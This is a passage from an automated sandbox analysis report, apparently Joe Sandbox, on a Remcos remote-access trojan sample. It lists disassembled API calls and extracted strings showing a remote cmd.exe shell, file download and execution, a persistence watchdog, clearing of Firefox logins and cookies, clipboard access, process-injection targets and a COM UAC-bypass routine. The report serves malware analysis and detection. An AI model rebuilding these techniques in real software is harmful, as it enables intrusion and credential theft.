                                                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                    • API String ID: 1067849700-181434739
                                                                    • Opcode ID: 7b51ad7f5ad0c7abac8af81cbc9055b2372de2e2c8d5ab3c999aee0cc02c0450
                                                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                    • Opcode Fuzzy Hash: 7b51ad7f5ad0c7abac8af81cbc9055b2372de2e2c8d5ab3c999aee0cc02c0450
                                                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                    • CloseHandle.KERNEL32 ref: 00405A23
                                                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                                                    • CloseHandle.KERNEL32 ref: 00405A45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                    • API String ID: 2994406822-18413064
                                                                    • Opcode ID: 577ca10e1235243461cf920444bb6168e87e2a1cd004a88accc290b0b4821642
                                                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                    • Opcode Fuzzy Hash: 577ca10e1235243461cf920444bb6168e87e2a1cd004a88accc290b0b4821642
                                                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                    APIs
                                                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                    • API String ID: 3018269243-13974260
                                                                    • Opcode ID: f1cae38a3dcc304660eaedc6339eaa9013320fa9bdd48c3eb03c28d4701009fa
                                                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                    • Opcode Fuzzy Hash: f1cae38a3dcc304660eaedc6339eaa9013320fa9bdd48c3eb03c28d4701009fa
                                                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                    • API String ID: 1164774033-3681987949
                                                                    • Opcode ID: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
                                                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                                                    • Opcode Fuzzy Hash: 0727e96575f382ce024b770c9cf78de508cdcdbf02e88d565c43a0fb52ad4714
                                                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                                                    APIs
                                                                    • OpenClipboard.USER32 ref: 004168C2
                                                                    • EmptyClipboard.USER32 ref: 004168D0
                                                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                    • CloseClipboard.USER32 ref: 00416955
                                                                    • OpenClipboard.USER32 ref: 0041695C
                                                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                    • CloseClipboard.USER32 ref: 00416984
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                    • String ID: !D@$hdF
                                                                    • API String ID: 3520204547-3475379602
                                                                    • Opcode ID: 1202c500542ab5353202d803cc03ce7c7b0dbd2eed84b1b9234af209fd6764a9
                                                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                    • Opcode Fuzzy Hash: 1202c500542ab5353202d803cc03ce7c7b0dbd2eed84b1b9234af209fd6764a9
                                                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,0%s), ref: 0040F48E
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,0%s), ref: 0040F563
                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                    • CloseHandle.KERNEL32(00000000,?,0%s), ref: 0040F66E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                    • String ID: 0%s$C:\Program Files(x86)\Internet Explorer\$Inj$hdF$hdF$ieinstal.exe$ielowutil.exe
                                                                    • API String ID: 3756808967-2964822984
                                                                    • Opcode ID: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                    • Opcode Fuzzy Hash: a44d1c149e9206c8c5790be5d5281b0a3ac589c6ddaf07dd4e5038071b524407
                                                                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                    APIs
                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                                                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                                                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                                                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$Close$File$FirstNext
                                                                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                    • API String ID: 3527384056-432212279
                                                                    • Opcode ID: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
                                                                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                                                    • Opcode Fuzzy Hash: a832034822c3cb66eb5f8080b7cde16d67028b55a024d1e421a8b91fcbbd43ec
                                                                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                                                    APIs
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                                    • String ID:
                                                                    • API String ID: 297527592-0
                                                                    • Opcode ID: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                                    • Opcode Fuzzy Hash: cbaf96c0539d14e3bfc579cb390cbf1a6d01f92e477562203843d299bee7c5bd
                                                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0$1$2$3$4$5$6$7$VG
                                                                    • API String ID: 0-1861860590
                                                                    • Opcode ID: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                    • Opcode Fuzzy Hash: a0898ada7235e23996d16a558f3c20519f182ec80e29ad8a8220548995af58c0
                                                                    • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00407521
                                                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object_wcslen
                                                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                    • API String ID: 240030777-3166923314
                                                                    • Opcode ID: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                    • Opcode Fuzzy Hash: c58fb5e2275a5e844cecf76189ae7002021d5fd77b9420cad953500b1bf3d6e9
                                                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                    APIs
                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                    • String ID:
                                                                    • API String ID: 3587775597-0
                                                                    • Opcode ID: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                    • Opcode Fuzzy Hash: c686599948fa5da1445dac0334782799476a653eb7c8e4d05ef1c0b84818098d
                                                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Find$CreateFirstNext
                                                                    • String ID: (eF$0%s$PXG$PXG$NG$PG
                                                                    • API String ID: 341183262-1670555038
                                                                    • Opcode ID: c2998d5eec4de5674b2cbe39951494bdcfd3910cf9acbc298843b3e388c46c04
                                                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                    • Opcode Fuzzy Hash: c2998d5eec4de5674b2cbe39951494bdcfd3910cf9acbc298843b3e388c46c04
                                                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                    • String ID: lJD$lJD$lJD
                                                                    • API String ID: 745075371-479184356
                                                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
